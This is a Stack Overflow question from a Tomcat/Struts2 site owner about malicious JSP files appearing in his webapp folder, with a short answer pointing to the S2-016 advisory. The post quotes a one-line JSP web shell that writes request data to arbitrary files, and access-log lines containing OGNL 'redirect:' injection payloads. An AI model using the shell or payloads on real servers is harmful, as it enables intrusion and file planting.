# Tomcat Files Getting uploaded - Security Loophole

Tags: security, tomcat, struts2, tomcat7, xwork

I have a tried hosting a struts2 app on public domain using tomcat 7x with Apache 2.2 fronting tomcat.

I see some malicious activity in my web app folder.

Every time I see some files like indcx.jsp, maneger.jsp, uplod.jsp etc and many such unknown files getting uploaded into tomcat/webapp/application folder.

I manually delete these files every time, but wanted to know if we have any setting or configuration which can avoid such malicious / hacker activity and uploading of such unknown files.

Edit

I have seen such files again and the contents of the file are as below

```
  <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
```

My question is how is someone able to upload this file on my server?

Edit Again

After close analysis this looks a struts2 or xwork security issue or vulnerability now, here are all the logs which tell most of the remaining story

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

Comment: Can you clarify what you are hosting where and what exactly the malicious activity is that you're seeing? (Asking about best practices and security tips is explicitly off-topic on Stack Overflow, though.)

Comment: @Pekka웃 I am hosting a web application using struts2 and malicious activity that I see is unknown files getting uploaded in my tomcat/webapp/app folder

Comment: But what kinds of files, on what kind of server? How do you know it's malicious and not some automatic system job? Who is the server admin, where is the server running? This really needs more detail and context.

Comment: They are some code file, I am having a vps account and myself managing the server & tomcat. These are not automatic system job files atall that's what is my concern.

Comment: Strange. What do those files contain?

Comment: Currently i have deleted them, in a days time I will get few more and will upload it for your reference.

Comment: Updated the issue - plz help

Answer (score 0):

Seems like you need to upgrade your struts2. Certain versions are vulnerable to what you're describing: http://struts.apache.org/release/2.3.x/docs/s2-016.html